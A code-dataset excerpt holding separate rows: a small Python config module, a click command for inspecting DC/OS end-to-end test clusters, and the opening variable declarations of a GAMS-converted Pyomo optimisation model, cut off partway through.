content
stringlengths
5
1.05M
from ..config import PROGRAM #APP = "%s-%s" % (PROGRAM, "baf") APP = PROGRAM MODULE = "baf"
""" Tools for inspecting existing clusters. """ import click from dcos_e2e_cli.common.inspect_cluster import show_cluster_details from dcos_e2e_cli.common.options import ( existing_cluster_id_option, verbosity_option, ) from dcos_e2e_cli.common.utils import check_cluster_id_exists from ._common import ClusterVMs, existing_cluster_ids @click.command('inspect') @existing_cluster_id_option @verbosity_option def inspect_cluster(cluster_id: str) -> None: """ Show cluster details. """ check_cluster_id_exists( new_cluster_id=cluster_id, existing_cluster_ids=existing_cluster_ids(), ) cluster_vms = ClusterVMs(cluster_id=cluster_id) show_cluster_details( cluster_id=cluster_id, cluster_representation=cluster_vms, )
# MINLP written by GAMS Convert at 01/15/21 11:37:20 # # Equation counts # Total E G L N X C B # 2935 1123 129 1683 0 0 0 0 # # Variable counts # x b i s1s s2s sc si # Total cont binary integer sos1 sos2 scont sint # 1759 1387 372 0 0 0 0 0 # FX 0 0 0 0 0 0 0 0 # # Nonzero counts # Total const NL DLL # 6934 6754 180 0 # # Reformulation has removed 1 variable and 1 equation from pyomo.environ import * model = m = ConcreteModel() m.x2 = Var(within=Reals,bounds=(0,None),initialize=0) m.x3 = Var(within=Reals,bounds=(0,None),initialize=0) m.x4 = Var(within=Reals,bounds=(0,None),initialize=0) m.x5 = Var(within=Reals,bounds=(0,None),initialize=0) m.x6 = Var(within=Reals,bounds=(0,None),initialize=0) m.x7 = Var(within=Reals,bounds=(0,None),initialize=0) m.x8 = Var(within=Reals,bounds=(0,None),initialize=0) m.x9 = Var(within=Reals,bounds=(0,None),initialize=0) m.x10 = Var(within=Reals,bounds=(0,None),initialize=0) m.x11 = Var(within=Reals,bounds=(0,None),initialize=0) m.x12 = Var(within=Reals,bounds=(0,None),initialize=0) m.x13 = Var(within=Reals,bounds=(0,None),initialize=0) m.x14 = Var(within=Reals,bounds=(0,None),initialize=0) m.x15 = Var(within=Reals,bounds=(0,None),initialize=0) m.x16 = Var(within=Reals,bounds=(0,None),initialize=0) m.x17 = Var(within=Reals,bounds=(0,None),initialize=0) m.x18 = Var(within=Reals,bounds=(0,None),initialize=0) m.x19 = Var(within=Reals,bounds=(0,None),initialize=0) m.x20 = Var(within=Reals,bounds=(0,None),initialize=0) m.x21 = Var(within=Reals,bounds=(0,None),initialize=0) m.x22 = Var(within=Reals,bounds=(0,None),initialize=0) m.x23 = Var(within=Reals,bounds=(0,None),initialize=0) m.x24 = Var(within=Reals,bounds=(0,None),initialize=0) m.x25 = Var(within=Reals,bounds=(0,None),initialize=0) m.x26 = Var(within=Reals,bounds=(0,None),initialize=0) m.x27 = Var(within=Reals,bounds=(0,None),initialize=0) m.x28 = Var(within=Reals,bounds=(0,None),initialize=0) m.x29 = Var(within=Reals,bounds=(0,None),initialize=0) m.x30 = Var(within=Reals,bounds=(0,None),initialize=0) m.x31 = Var(within=Reals,bounds=(0,None),initialize=0) m.x32 = Var(within=Reals,bounds=(0,None),initialize=0) m.x33 = Var(within=Reals,bounds=(0,None),initialize=0) m.x34 = Var(within=Reals,bounds=(0,None),initialize=0) m.x35 = Var(within=Reals,bounds=(0,None),initialize=0) m.x36 = Var(within=Reals,bounds=(0,None),initialize=0) m.x37 = Var(within=Reals,bounds=(0,None),initialize=0) m.x38 = Var(within=Reals,bounds=(0,None),initialize=0) m.x39 = Var(within=Reals,bounds=(0,None),initialize=0) m.x40 = Var(within=Reals,bounds=(0,None),initialize=0) m.x41 = Var(within=Reals,bounds=(0,None),initialize=0) m.x42 = Var(within=Reals,bounds=(0,None),initialize=0) m.x43 = Var(within=Reals,bounds=(0,None),initialize=0) m.x44 = Var(within=Reals,bounds=(0,None),initialize=0) m.x45 = Var(within=Reals,bounds=(0,None),initialize=0) m.x46 = Var(within=Reals,bounds=(0,None),initialize=0) m.x47 = Var(within=Reals,bounds=(0,None),initialize=0) m.x48 = Var(within=Reals,bounds=(0,None),initialize=0) m.x49 = Var(within=Reals,bounds=(0,None),initialize=0) m.x50 = Var(within=Reals,bounds=(0,None),initialize=0) m.x51 = Var(within=Reals,bounds=(0,None),initialize=0) m.x52 = Var(within=Reals,bounds=(0,None),initialize=0) m.x53 = Var(within=Reals,bounds=(0,None),initialize=0) m.x54 = Var(within=Reals,bounds=(0,None),initialize=0) m.x55 = Var(within=Reals,bounds=(0,None),initialize=0) m.x56 = Var(within=Reals,bounds=(0,None),initialize=0) m.x57 = Var(within=Reals,bounds=(0,None),initialize=0) m.x58 = Var(within=Reals,bounds=(0,None),initialize=0) m.x59 = Var(within=Reals,bounds=(0,None),initialize=0) m.x60 = Var(within=Reals,bounds=(0,None),initialize=0) m.x61 = Var(within=Reals,bounds=(0,None),initialize=0) m.x62 = Var(within=Reals,bounds=(0,None),initialize=0) m.x63 = Var(within=Reals,bounds=(0,None),initialize=0) m.x64 = Var(within=Reals,bounds=(0,None),initialize=0) m.x65 = Var(within=Reals,bounds=(0,None),initialize=0) m.x66 = Var(within=Reals,bounds=(0,None),initialize=0) m.x67 = Var(within=Reals,bounds=(0,None),initialize=0) m.x68 = Var(within=Reals,bounds=(0,None),initialize=0) m.x69 = Var(within=Reals,bounds=(0,None),initialize=0) m.x70 = Var(within=Reals,bounds=(0,None),initialize=0) m.x71 = Var(within=Reals,bounds=(0,None),initialize=0) m.x72 = Var(within=Reals,bounds=(0,None),initialize=0) m.x73 = Var(within=Reals,bounds=(0,None),initialize=0) m.x74 = Var(within=Reals,bounds=(0,None),initialize=0) m.x75 = Var(within=Reals,bounds=(0,None),initialize=0) m.x76 = Var(within=Reals,bounds=(0,None),initialize=0) m.x77 = Var(within=Reals,bounds=(0,None),initialize=0) m.x78 = Var(within=Reals,bounds=(0,None),initialize=0) m.x79 = Var(within=Reals,bounds=(0,None),initialize=0) m.x80 = Var(within=Reals,bounds=(0,None),initialize=0) m.x81 = Var(within=Reals,bounds=(0,None),initialize=0) m.x82 = Var(within=Reals,bounds=(0,None),initialize=0) m.x83 = Var(within=Reals,bounds=(0,None),initialize=0) m.x84 = Var(within=Reals,bounds=(0,None),initialize=0) m.x85 = Var(within=Reals,bounds=(0,None),initialize=0) m.x86 = Var(within=Reals,bounds=(0,None),initialize=0) m.x87 = Var(within=Reals,bounds=(0,None),initialize=0) m.x88 = Var(within=Reals,bounds=(0,None),initialize=0) m.x89 = Var(within=Reals,bounds=(0,None),initialize=0) m.x90 = Var(within=Reals,bounds=(0,None),initialize=0) m.x91 = Var(within=Reals,bounds=(0,None),initialize=0) m.x92 = Var(within=Reals,bounds=(0,None),initialize=0) m.x93 = Var(within=Reals,bounds=(0,None),initialize=0) m.x94 = Var(within=Reals,bounds=(0,None),initialize=0) m.x95 = Var(within=Reals,bounds=(0,None),initialize=0) m.x96 = Var(within=Reals,bounds=(0,None),initialize=0) m.x97 = Var(within=Reals,bounds=(0,None),initialize=0) m.x98 = Var(within=Reals,bounds=(0,None),initialize=0) m.x99 = Var(within=Reals,bounds=(0,None),initialize=0) m.x100 = Var(within=Reals,bounds=(0,None),initialize=0) m.x101 = Var(within=Reals,bounds=(0,None),initialize=0) m.x102 = Var(within=Reals,bounds=(0,None),initialize=0) m.x103 = Var(within=Reals,bounds=(0,None),initialize=0) m.x104 = Var(within=Reals,bounds=(0,None),initialize=0) m.x105 = Var(within=Reals,bounds=(0,None),initialize=0) m.x106 = Var(within=Reals,bounds=(0,None),initialize=0) m.x107 = Var(within=Reals,bounds=(0,None),initialize=0) m.x108 = Var(within=Reals,bounds=(0,None),initialize=0) m.x109 = Var(within=Reals,bounds=(0,None),initialize=0) m.x110 = Var(within=Reals,bounds=(0,None),initialize=0) m.x111 = Var(within=Reals,bounds=(0,None),initialize=0) m.x112 = Var(within=Reals,bounds=(0,None),initialize=0) m.x113 = Var(within=Reals,bounds=(0,None),initialize=0) m.x114 = Var(within=Reals,bounds=(0,None),initialize=0) m.x115 = Var(within=Reals,bounds=(0,None),initialize=0) m.x116 = Var(within=Reals,bounds=(0,None),initialize=0) m.x117 = Var(within=Reals,bounds=(0,None),initialize=0) m.x118 = Var(within=Reals,bounds=(0,None),initialize=0) m.x119 = Var(within=Reals,bounds=(0,None),initialize=0) m.x120 = Var(within=Reals,bounds=(0,None),initialize=0) m.x121 = Var(within=Reals,bounds=(0,None),initialize=0) m.x122 = Var(within=Reals,bounds=(0,None),initialize=0) m.x123 = Var(within=Reals,bounds=(0,None),initialize=0) m.x124 = Var(within=Reals,bounds=(0,None),initialize=0) m.x125 = Var(within=Reals,bounds=(0,None),initialize=0) m.x126 = Var(within=Reals,bounds=(0,None),initialize=0) m.x127 = Var(within=Reals,bounds=(0,None),initialize=0) m.x128 = Var(within=Reals,bounds=(0,None),initialize=0) m.x129 = Var(within=Reals,bounds=(0,None),initialize=0) m.x130 = Var(within=Reals,bounds=(0,None),initialize=0) m.x131 = Var(within=Reals,bounds=(0,None),initialize=0) m.x132 = Var(within=Reals,bounds=(0,None),initialize=0) m.x133 = Var(within=Reals,bounds=(0,None),initialize=0) m.x134 = Var(within=Reals,bounds=(0,None),initialize=0) m.x135 = Var(within=Reals,bounds=(0,None),initialize=0) m.x136 = Var(within=Reals,bounds=(0,None),initialize=0) m.x137 = Var(within=Reals,bounds=(0,None),initialize=0) m.x138 = Var(within=Reals,bounds=(0,None),initialize=0) m.x139 = Var(within=Reals,bounds=(0,None),initialize=0) m.x140 = Var(within=Reals,bounds=(0,None),initialize=0) m.x141 = Var(within=Reals,bounds=(0,None),initialize=0) m.x142 = Var(within=Reals,bounds=(0,None),initialize=0) m.x143 = Var(within=Reals,bounds=(0,None),initialize=0) m.x144 = Var(within=Reals,bounds=(0,None),initialize=0) m.x145 = Var(within=Reals,bounds=(0,None),initialize=0) m.x146 = Var(within=Reals,bounds=(0,None),initialize=0) m.x147 = Var(within=Reals,bounds=(0,None),initialize=0) m.x148 = Var(within=Reals,bounds=(0,None),initialize=0) m.x149 = Var(within=Reals,bounds=(0,None),initialize=0) m.x150 = Var(within=Reals,bounds=(0,None),initialize=0) m.x151 = Var(within=Reals,bounds=(0,None),initialize=0) m.x152 = Var(within=Reals,bounds=(0,None),initialize=0) m.x153 = Var(within=Reals,bounds=(0,None),initialize=0) m.x154 = Var(within=Reals,bounds=(0,None),initialize=0) m.x155 = Var(within=Reals,bounds=(0,None),initialize=0) m.x156 = Var(within=Reals,bounds=(0,None),initialize=0) m.x157 = Var(within=Reals,bounds=(0,None),initialize=0) m.x158 = Var(within=Reals,bounds=(0,None),initialize=0) m.x159 = Var(within=Reals,bounds=(0,None),initialize=0) m.x160 = Var(within=Reals,bounds=(0,None),initialize=0) m.x161 = Var(within=Reals,bounds=(0,None),initialize=0) m.x162 = Var(within=Reals,bounds=(0,None),initialize=0) m.x163 = Var(within=Reals,bounds=(0,None),initialize=0) m.x164 = Var(within=Reals,bounds=(0,None),initialize=0) m.x165 = Var(within=Reals,bounds=(0,None),initialize=0) m.x166 = Var(within=Reals,bounds=(0,None),initialize=0) m.x167 = Var(within=Reals,bounds=(0,None),initialize=0) m.x168 = Var(within=Reals,bounds=(0,None),initialize=0) m.x169 = Var(within=Reals,bounds=(0,None),initialize=0) m.x170 = Var(within=Reals,bounds=(0,None),initialize=0) m.x171 = Var(within=Reals,bounds=(0,None),initialize=0) m.x172 = Var(within=Reals,bounds=(0,None),initialize=0) m.x173 = Var(within=Reals,bounds=(0,None),initialize=0) m.x174 = Var(within=Reals,bounds=(0,None),initialize=0) m.x175 = Var(within=Reals,bounds=(0,None),initialize=0) m.x176 = Var(within=Reals,bounds=(0,None),initialize=0) m.x177 = Var(within=Reals,bounds=(0,None),initialize=0) m.x178 = Var(within=Reals,bounds=(0,None),initialize=0) m.x179 = Var(within=Reals,bounds=(0,None),initialize=0) m.x180 = Var(within=Reals,bounds=(0,None),initialize=0) m.x181 = Var(within=Reals,bounds=(0,None),initialize=0) m.x182 = Var(within=Reals,bounds=(0,None),initialize=0) m.x183 = Var(within=Reals,bounds=(0,None),initialize=0) m.x184 = Var(within=Reals,bounds=(0,None),initialize=0) m.x185 = Var(within=Reals,bounds=(0,None),initialize=0) m.x186 = Var(within=Reals,bounds=(0,None),initialize=0) m.x187 = Var(within=Reals,bounds=(0,None),initialize=0) m.x188 = Var(within=Reals,bounds=(0,None),initialize=0) m.x189 = Var(within=Reals,bounds=(0,None),initialize=0) m.x190 = Var(within=Reals,bounds=(0,None),initialize=0) m.x191 = Var(within=Reals,bounds=(0,None),initialize=0) m.x192 = Var(within=Reals,bounds=(0,None),initialize=0) m.x193 = Var(within=Reals,bounds=(0,None),initialize=0) m.x194 = Var(within=Reals,bounds=(0,None),initialize=0) m.x195 = Var(within=Reals,bounds=(0,None),initialize=0) m.x196 = Var(within=Reals,bounds=(0,None),initialize=0) m.x197 = Var(within=Reals,bounds=(0,None),initialize=0) m.x198 = Var(within=Reals,bounds=(0,None),initialize=0) m.x199 = Var(within=Reals,bounds=(0,None),initialize=0) m.x200 = Var(within=Reals,bounds=(0,None),initialize=0) m.x201 = Var(within=Reals,bounds=(0,None),initialize=0) m.x202 = Var(within=Reals,bounds=(0,None),initialize=0) m.x203 = Var(within=Reals,bounds=(0,None),initialize=0) m.x204 = Var(within=Reals,bounds=(0,None),initialize=0) m.x205 = Var(within=Reals,bounds=(0,None),initialize=0) m.x206 = Var(within=Reals,bounds=(0,None),initialize=0) m.x207 = Var(within=Reals,bounds=(0,None),initialize=0) m.x208 = Var(within=Reals,bounds=(0,None),initialize=0) m.x209 = Var(within=Reals,bounds=(0,None),initialize=0) m.x210 = Var(within=Reals,bounds=(0,None),initialize=0) m.x211 = Var(within=Reals,bounds=(0,None),initialize=0) m.x212 = Var(within=Reals,bounds=(0,None),initialize=0) m.x213 = Var(within=Reals,bounds=(0,None),initialize=0) m.x214 = Var(within=Reals,bounds=(0,None),initialize=0) m.x215 = Var(within=Reals,bounds=(0,None),initialize=0) m.x216 = Var(within=Reals,bounds=(0,None),initialize=0) m.x217 = Var(within=Reals,bounds=(0,None),initialize=0) m.x218 = Var(within=Reals,bounds=(0,None),initialize=0) m.x219 = Var(within=Reals,bounds=(0,None),initialize=0) m.x220 = Var(within=Reals,bounds=(0,None),initialize=0) m.x221 = Var(within=Reals,bounds=(0,None),initialize=0) m.x222 = Var(within=Reals,bounds=(0,None),initialize=0) m.x223 = Var(within=Reals,bounds=(0,None),initialize=0) m.x224 = Var(within=Reals,bounds=(0,None),initialize=0) m.x225 = Var(within=Reals,bounds=(0,None),initialize=0) m.x226 = Var(within=Reals,bounds=(0,None),initialize=0) m.x227 = Var(within=Reals,bounds=(0,None),initialize=0) m.x228 = Var(within=Reals,bounds=(0,None),initialize=0) m.x229 = Var(within=Reals,bounds=(0,None),initialize=0) m.x230 = Var(within=Reals,bounds=(0,None),initialize=0) m.x231 = Var(within=Reals,bounds=(0,None),initialize=0) m.x232 = Var(within=Reals,bounds=(0,None),initialize=0) m.x233 = Var(within=Reals,bounds=(0,None),initialize=0) m.x234 = Var(within=Reals,bounds=(0,None),initialize=0) m.x235 = Var(within=Reals,bounds=(0,None),initialize=0) m.x236 = Var(within=Reals,bounds=(0,None),initialize=0) m.x237 = Var(within=Reals,bounds=(0,None),initialize=0) m.x238 = Var(within=Reals,bounds=(0,None),initialize=0) m.x239 = Var(within=Reals,bounds=(0,None),initialize=0) m.x240 = Var(within=Reals,bounds=(0,None),initialize=0) m.x241 = Var(within=Reals,bounds=(0,None),initialize=0) m.x242 = Var(within=Reals,bounds=(0,None),initialize=0) m.x243 = Var(within=Reals,bounds=(0,None),initialize=0) m.x244 = Var(within=Reals,bounds=(0,None),initialize=0) m.x245 = Var(within=Reals,bounds=(0,None),initialize=0) m.x246 = Var(within=Reals,bounds=(0,None),initialize=0) m.x247 = Var(within=Reals,bounds=(0,None),initialize=0) m.x248 = Var(within=Reals,bounds=(0,None),initialize=0) m.x249 = Var(within=Reals,bounds=(0,None),initialize=0) m.x250 = Var(within=Reals,bounds=(0,None),initialize=0) m.x251 = Var(within=Reals,bounds=(0,None),initialize=0) m.x252 = Var(within=Reals,bounds=(0,None),initialize=0) m.x253 = Var(within=Reals,bounds=(0,None),initialize=0) m.x254 = Var(within=Reals,bounds=(0,None),initialize=0) m.x255 = Var(within=Reals,bounds=(0,None),initialize=0) m.x256 = Var(within=Reals,bounds=(0,None),initialize=0) m.x257 = Var(within=Reals,bounds=(0,None),initialize=0) m.x258 = Var(within=Reals,bounds=(0,None),initialize=0) m.x259 = Var(within=Reals,bounds=(0,None),initialize=0) m.x260 = Var(within=Reals,bounds=(0,None),initialize=0) m.x261 = Var(within=Reals,bounds=(0,None),initialize=0) m.x262 = Var(within=Reals,bounds=(0,None),initialize=0) m.x263 = Var(within=Reals,bounds=(0,None),initialize=0) m.x264 = Var(within=Reals,bounds=(0,None),initialize=0) m.x265 = Var(within=Reals,bounds=(0,None),initialize=0) m.x266 = Var(within=Reals,bounds=(0,None),initialize=0) m.x267 = Var(within=Reals,bounds=(0,None),initialize=0) m.x268 = Var(within=Reals,bounds=(0,None),initialize=0) m.x269 = Var(within=Reals,bounds=(0,None),initialize=0) m.x270 = Var(within=Reals,bounds=(0,None),initialize=0) m.x271 = Var(within=Reals,bounds=(0,None),initialize=0) m.x272 = Var(within=Reals,bounds=(0,None),initialize=0) m.x273 = Var(within=Reals,bounds=(0,None),initialize=0) m.x274 = Var(within=Reals,bounds=(0,None),initialize=0) m.x275 = Var(within=Reals,bounds=(0,None),initialize=0) m.x276 = Var(within=Reals,bounds=(0,None),initialize=0) m.x277 = Var(within=Reals,bounds=(0,None),initialize=0) m.x278 = Var(within=Reals,bounds=(0,None),initialize=0) m.x279 = Var(within=Reals,bounds=(0,None),initialize=0) m.x280 = Var(within=Reals,bounds=(0,None),initialize=0) m.x281 = Var(within=Reals,bounds=(0,None),initialize=0) m.x282 = Var(within=Reals,bounds=(0,None),initialize=0) m.x283 = Var(within=Reals,bounds=(0,None),initialize=0) m.x284 = Var(within=Reals,bounds=(0,None),initialize=0) m.x285 = Var(within=Reals,bounds=(0,None),initialize=0) m.x286 = Var(within=Reals,bounds=(0,None),initialize=0) m.x287 = Var(within=Reals,bounds=(0,None),initialize=0) m.x288 = Var(within=Reals,bounds=(0,None),initialize=0) m.x289 = Var(within=Reals,bounds=(0,None),initialize=0) m.x290 = Var(within=Reals,bounds=(0,None),initialize=0) m.x291 = Var(within=Reals,bounds=(0,None),initialize=0) m.x292 = Var(within=Reals,bounds=(0,None),initialize=0) m.x293 = Var(within=Reals,bounds=(0,None),initialize=0) m.x294 = Var(within=Reals,bounds=(0,None),initialize=0) m.x295 = Var(within=Reals,bounds=(0,None),initialize=0) m.x296 = Var(within=Reals,bounds=(0,None),initialize=0) m.x297 = Var(within=Reals,bounds=(0,None),initialize=0) m.x298 = Var(within=Reals,bounds=(0,None),initialize=0) m.x299 = Var(within=Reals,bounds=(0,None),initialize=0) m.x300 = Var(within=Reals,bounds=(0,None),initialize=0) m.x301 = Var(within=Reals,bounds=(0,None),initialize=0) m.x302 = Var(within=Reals,bounds=(0,None),initialize=0) m.x303 = Var(within=Reals,bounds=(0,None),initialize=0) m.x304 = Var(within=Reals,bounds=(0,None),initialize=0) m.x305 = Var(within=Reals,bounds=(0,None),initialize=0) m.x306 = Var(within=Reals,bounds=(0,None),initialize=0) m.x307 = Var(within=Reals,bounds=(0,None),initialize=0) m.x308 = Var(within=Reals,bounds=(0,None),initialize=0) m.x309 = Var(within=Reals,bounds=(0,None),initialize=0) m.x310 = Var(within=Reals,bounds=(0,None),initialize=0) m.x311 = Var(within=Reals,bounds=(0,None),initialize=0) m.x312 = Var(within=Reals,bounds=(0,None),initialize=0) m.x313 = Var(within=Reals,bounds=(0,None),initialize=0) m.x314 = Var(within=Reals,bounds=(0,None),initialize=0) m.x315 = Var(within=Reals,bounds=(0,None),initialize=0) m.x316 = Var(within=Reals,bounds=(0,None),initialize=0) m.x317 = Var(within=Reals,bounds=(0,None),initialize=0) m.x318 = Var(within=Reals,bounds=(0,None),initialize=0) m.x319 = Var(within=Reals,bounds=(0,None),initialize=0) m.x320 = Var(within=Reals,bounds=(0,None),initialize=0) m.x321 = Var(within=Reals,bounds=(0,None),initialize=0) m.x322 = Var(within=Reals,bounds=(0,None),initialize=0) m.x323 = Var(within=Reals,bounds=(0,None),initialize=0) m.x324 = Var(within=Reals,bounds=(0,None),initialize=0) m.x325 = Var(within=Reals,bounds=(0,None),initialize=0) m.x326 = Var(within=Reals,bounds=(0,None),initialize=0) m.x327 = Var(within=Reals,bounds=(0,None),initialize=0) m.x328 = Var(within=Reals,bounds=(0,None),initialize=0) m.x329 = Var(within=Reals,bounds=(0,None),initialize=0) m.x330 = Var(within=Reals,bounds=(0,None),initialize=0) m.x331 = Var(within=Reals,bounds=(0,None),initialize=0) m.x332 = Var(within=Reals,bounds=(0,None),initialize=0) m.x333 = Var(within=Reals,bounds=(0,None),initialize=0) m.x334 = Var(within=Reals,bounds=(0,None),initialize=0) m.x335 = Var(within=Reals,bounds=(0,None),initialize=0) m.x336 = Var(within=Reals,bounds=(0,None),initialize=0) m.x337 = Var(within=Reals,bounds=(0,None),initialize=0) m.x338 = Var(within=Reals,bounds=(0,None),initialize=0) m.x339 = Var(within=Reals,bounds=(0,None),initialize=0) m.x340 = Var(within=Reals,bounds=(0,None),initialize=0) m.x341 = Var(within=Reals,bounds=(0,None),initialize=0) m.x342 = Var(within=Reals,bounds=(0,None),initialize=0) m.x343 = Var(within=Reals,bounds=(0,None),initialize=0) m.x344 = Var(within=Reals,bounds=(0,None),initialize=0) m.x345 = Var(within=Reals,bounds=(0,None),initialize=0) m.x346 = Var(within=Reals,bounds=(0,None),initialize=0) m.x347 = Var(within=Reals,bounds=(0,None),initialize=0) m.x348 = Var(within=Reals,bounds=(0,None),initialize=0) m.x349 = Var(within=Reals,bounds=(0,None),initialize=0) m.x350 = Var(within=Reals,bounds=(0,None),initialize=0) m.x351 = Var(within=Reals,bounds=(0,None),initialize=0) m.x352 = Var(within=Reals,bounds=(0,None),initialize=0) m.x353 = Var(within=Reals,bounds=(0,None),initialize=0) m.x354 = Var(within=Reals,bounds=(0,None),initialize=0) m.x355 = Var(within=Reals,bounds=(0,None),initialize=0) m.x356 = Var(within=Reals,bounds=(0,None),initialize=0) m.x357 = Var(within=Reals,bounds=(0,None),initialize=0) m.x358 = Var(within=Reals,bounds=(0,None),initialize=0) m.x359 = Var(within=Reals,bounds=(0,None),initialize=0) m.x360 = Var(within=Reals,bounds=(0,None),initialize=0) m.x361 = Var(within=Reals,bounds=(0,None),initialize=0) m.x362 = Var(within=Reals,bounds=(0,None),initialize=0) m.x363 = Var(within=Reals,bounds=(0,None),initialize=0) m.x364 = Var(within=Reals,bounds=(0,None),initialize=0) m.x365 = Var(within=Reals,bounds=(0,None),initialize=0) m.x366 = Var(within=Reals,bounds=(0,None),initialize=0) m.x367 = Var(within=Reals,bounds=(0,None),initialize=0) m.x368 = Var(within=Reals,bounds=(0,None),initialize=0) m.x369 = Var(within=Reals,bounds=(0,None),initialize=0) m.x370 = Var(within=Reals,bounds=(0,None),initialize=0) m.x371 = Var(within=Reals,bounds=(0,None),initialize=0) m.x372 = Var(within=Reals,bounds=(0,None),initialize=0) m.x373 = Var(within=Reals,bounds=(0,None),initialize=0) m.x374 = Var(within=Reals,bounds=(0,None),initialize=0) m.x375 = Var(within=Reals,bounds=(0,None),initialize=0) m.x376 = Var(within=Reals,bounds=(0,None),initialize=0) m.x377 = Var(within=Reals,bounds=(0,None),initialize=0) m.x378 = Var(within=Reals,bounds=(0,None),initialize=0) m.x379 = Var(within=Reals,bounds=(0,None),initialize=0) m.x380 = Var(within=Reals,bounds=(0,None),initialize=0) m.x381 = Var(within=Reals,bounds=(0,None),initialize=0) m.x382 = Var(within=Reals,bounds=(0,None),initialize=0) m.x383 = Var(within=Reals,bounds=(0,None),initialize=0) m.x384 = Var(within=Reals,bounds=(0,None),initialize=0) m.x385 = Var(within=Reals,bounds=(0,None),initialize=0) m.x386 = Var(within=Reals,bounds=(0,None),initialize=0) m.x387 = Var(within=Reals,bounds=(0,None),initialize=0) m.x388 = Var(within=Reals,bounds=(0,None),initialize=0) m.x389 = Var(within=Reals,bounds=(0,None),initialize=0) m.x390 = Var(within=Reals,bounds=(0,None),initialize=0) m.x391 = Var(within=Reals,bounds=(0,None),initialize=0) m.x392 = Var(within=Reals,bounds=(0,None),initialize=0) m.x393 = Var(within=Reals,bounds=(0,None),initialize=0) m.x394 = Var(within=Reals,bounds=(0,None),initialize=0) m.x395 = Var(within=Reals,bounds=(0,None),initialize=0) m.x396 = Var(within=Reals,bounds=(0,None),initialize=0) m.x397 = Var(within=Reals,bounds=(0,None),initialize=0) m.x398 = Var(within=Reals,bounds=(0,None),initialize=0) m.x399 = Var(within=Reals,bounds=(0,None),initialize=0) m.x400 = Var(within=Reals,bounds=(0,None),initialize=0) m.x401 = Var(within=Reals,bounds=(0,None),initialize=0) m.x402 = Var(within=Reals,bounds=(0,None),initialize=0) m.x403 = Var(within=Reals,bounds=(0,None),initialize=0) m.x404 = Var(within=Reals,bounds=(0,None),initialize=0) m.x405 = Var(within=Reals,bounds=(0,None),initialize=0) m.x406 = Var(within=Reals,bounds=(0,None),initialize=0) m.x407 = Var(within=Reals,bounds=(0,None),initialize=0) m.x408 = Var(within=Reals,bounds=(0,None),initialize=0) m.x409 = Var(within=Reals,bounds=(0,None),initialize=0) m.x410 = Var(within=Reals,bounds=(0,None),initialize=0) m.x411 = Var(within=Reals,bounds=(0,None),initialize=0) m.x412 = Var(within=Reals,bounds=(0,None),initialize=0) m.x413 = Var(within=Reals,bounds=(0,None),initialize=0) m.x414 = Var(within=Reals,bounds=(0,None),initialize=0) m.x415 = Var(within=Reals,bounds=(0,None),initialize=0) m.x416 = Var(within=Reals,bounds=(0,None),initialize=0) m.x417 = Var(within=Reals,bounds=(0,None),initialize=0) m.x418 = Var(within=Reals,bounds=(0,None),initialize=0) m.x419 = Var(within=Reals,bounds=(0,None),initialize=0) m.x420 = Var(within=Reals,bounds=(0,None),initialize=0) m.x421 = Var(within=Reals,bounds=(0,None),initialize=0) m.x422 = Var(within=Reals,bounds=(0,None),initialize=0) m.x423 = Var(within=Reals,bounds=(0,None),initialize=0) m.x424 = Var(within=Reals,bounds=(0,None),initialize=0) m.x425 = Var(within=Reals,bounds=(0,None),initialize=0) m.x426 = Var(within=Reals,bounds=(0,None),initialize=0) m.x427 = Var(within=Reals,bounds=(0,None),initialize=0) m.x428 = Var(within=Reals,bounds=(0,None),initialize=0) m.x429 = Var(within=Reals,bounds=(0,None),initialize=0) m.x430 = Var(within=Reals,bounds=(0,None),initialize=0) m.x431 = Var(within=Reals,bounds=(0,None),initialize=0) m.x432 = Var(within=Reals,bounds=(0,None),initialize=0) m.x433 = Var(within=Reals,bounds=(0,None),initialize=0) m.x434 = Var(within=Reals,bounds=(0,None),initialize=0) m.x435 = Var(within=Reals,bounds=(0,None),initialize=0) m.x436 = Var(within=Reals,bounds=(0,None),initialize=0) m.x437 = Var(within=Reals,bounds=(0,None),initialize=0) m.x438 = Var(within=Reals,bounds=(0,None),initialize=0) m.x439 = Var(within=Reals,bounds=(0,None),initialize=0) m.x440 = Var(within=Reals,bounds=(0,None),initialize=0) m.x441 = Var(within=Reals,bounds=(0,None),initialize=0) m.x442 = Var(within=Reals,bounds=(0,None),initialize=0) m.x443 = Var(within=Reals,bounds=(0,None),initialize=0) m.x444 = Var(within=Reals,bounds=(0,None),initialize=0) m.x445 = Var(within=Reals,bounds=(0,None),initialize=0) m.x446 = Var(within=Reals,bounds=(0,None),initialize=0) m.x447 = Var(within=Reals,bounds=(0,None),initialize=0) m.x448 = Var(within=Reals,bounds=(0,None),initialize=0) m.x449 = Var(within=Reals,bounds=(0,None),initialize=0) m.x450 = Var(within=Reals,bounds=(0,None),initialize=0) m.x451 = Var(within=Reals,bounds=(0,None),initialize=0) m.x452 = Var(within=Reals,bounds=(0,None),initialize=0) m.x453 = Var(within=Reals,bounds=(0,None),initialize=0) m.x454 = Var(within=Reals,bounds=(0,None),initialize=0) m.x455 = Var(within=Reals,bounds=(0,None),initialize=0) m.x456 = Var(within=Reals,bounds=(0,None),initialize=0) m.x457 = Var(within=Reals,bounds=(0,None),initialize=0) m.x458 = Var(within=Reals,bounds=(0,None),initialize=0) m.x459 = Var(within=Reals,bounds=(0,None),initialize=0) m.x460 = Var(within=Reals,bounds=(0,None),initialize=0) m.x461 = Var(within=Reals,bounds=(0,None),initialize=0) m.x462 = Var(within=Reals,bounds=(0,None),initialize=0) m.x463 = Var(within=Reals,bounds=(0,None),initialize=0) m.x464 = Var(within=Reals,bounds=(0,None),initialize=0) m.x465 = Var(within=Reals,bounds=(0,None),initialize=0) m.x466 = Var(within=Reals,bounds=(0,None),initialize=0) m.x467 = Var(within=Reals,bounds=(0,None),initialize=0) m.x468 = Var(within=Reals,bounds=(0,None),initialize=0) m.x469 = Var(within=Reals,bounds=(0,None),initialize=0) m.x470 = Var(within=Reals,bounds=(0,None),initialize=0) m.x471 = Var(within=Reals,bounds=(0,None),initialize=0) m.x472 = Var(within=Reals,bounds=(0,None),initialize=0) m.x473 = Var(within=Reals,bounds=(0,None),initialize=0) m.x474 = Var(within=Reals,bounds=(0,None),initialize=0) m.x475 = Var(within=Reals,bounds=(0,None),initialize=0) m.x476 = Var(within=Reals,bounds=(0,None),initialize=0) m.x477 = Var(within=Reals,bounds=(0,None),initialize=0) m.x478 = Var(within=Reals,bounds=(0,None),initialize=0) m.x479 = Var(within=Reals,bounds=(0,None),initialize=0) m.x480 = Var(within=Reals,bounds=(0,None),initialize=0) m.x481 = Var(within=Reals,bounds=(0,None),initialize=0) m.x482 